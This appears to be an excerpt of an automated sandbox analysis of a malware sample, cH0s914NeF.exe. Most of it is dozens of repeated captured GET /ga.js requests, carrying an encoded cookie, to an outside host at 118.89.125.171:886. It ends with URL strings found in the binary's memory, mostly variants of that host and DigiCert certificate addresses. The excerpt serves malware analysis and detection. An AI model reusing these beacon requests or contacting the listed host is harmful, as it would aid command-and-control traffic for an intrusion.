Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: cSN0hYAW4Yrm2b2xvVjvCJAjmd1fcL15iOKbMV2Gg+VejBkXEXyaqymoFiDTK28Uc3vfFgvNWkdBi2t9W6uAbxYCZ4tBLaeZO/7MAorozKnVRsjKA4jqkZ5hAg9bpCP8xmRZIy5SpQVFB9BrBk1D5JQUhqeSsp4/jSx7R8QFvyY=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; 360space)Host: 118.89.125.171:886Connection: Keep-AliveCache-Control: no-cache

Source: cH0s914NeF.exe, 00000000.00000003.2307039847.0000000000139000.00000004.00000020.00020000.00000000.sdmp, cH0s914NeF.exe, 00000000.00000002.3262982479.00000000000EA000.00000004.00000020.00020000.00000000.sdmp, cH0s914NeF.exe, 00000000.00000002.3262982479.0000000000128000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://118.89.125.171:886/ZZv3
Source: cH0s914NeF.exe, 00000000.00000002.3262982479.00000000000EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://118.89.125.171:886/ZZv3ce
Source: cH0s914NeF.exe, 00000000.00000002.3262982479.00000000000EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://118.89.125.171:886/ZZv3mMM
Source: cH0s914NeF.exe, 00000000.00000002.3262982479.0000000000128000.00000004.00000020.00020000.00000000.sdmp, cH0s914NeF.exe, 00000000.00000003.2307039847.000000000014F000.00000004.00000020.00020000.00000000.sdmp, cH0s914NeF.exe, 00000000.00000002.3262982479.000000000014F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://118.89.125.171:886/ga.js
Source: cH0s914NeF.exe, 00000000.00000003.2307039847.0000000000139000.00000004.00000020.00020000.00000000.sdmp, cH0s914NeF.exe, 00000000.00000002.3262982479.0000000000128000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://118.89.125.171:886/ga.js5.171:886/ga.js
Source: cH0s914NeF.exe, 00000000.00000003.2307039847.0000000000139000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://118.89.125.171:886/ga.js5.171:886/ga.jsl
Source: cH0s914NeF.exe, 00000000.00000002.3262982479.0000000000128000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://118.89.125.171:886/ga.js6
Source: cH0s914NeF.exe, 00000000.00000003.2307039847.000000000014F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://118.89.125.171:886/ga.js8
Source: cH0s914NeF.exe, 00000000.00000002.3262982479.0000000000128000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://118.89.125.171:886/ga.jsO
Source: cH0s914NeF.exe, 00000000.00000003.2307039847.000000000014F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://118.89.125.171:886/ga.jsX
Source: cH0s914NeF.exe, 00000000.00000003.2307039847.0000000000139000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://118.89.125.171:886/ga.jsc
Source: cH0s914NeF.exe, 00000000.00000002.3262982479.000000000014F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://118.89.125.171:886/ga.jsp
Source: cH0s914NeF.exe, 00000000.00000002.3263573614.0000000003A60000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:%u/
Source: cH0s914NeF.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: cH0s914NeF.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: cH0s914NeF.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: cH0s914NeF.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: cH0s914NeF.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: cH0s914NeF.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: cH0s914NeF.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: cH0s914NeF.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: cH0s914NeF.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: cH0s914NeF.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: cH0s914NeF.exe	String found in binary or memory: http://ocsp.digicert.com0A
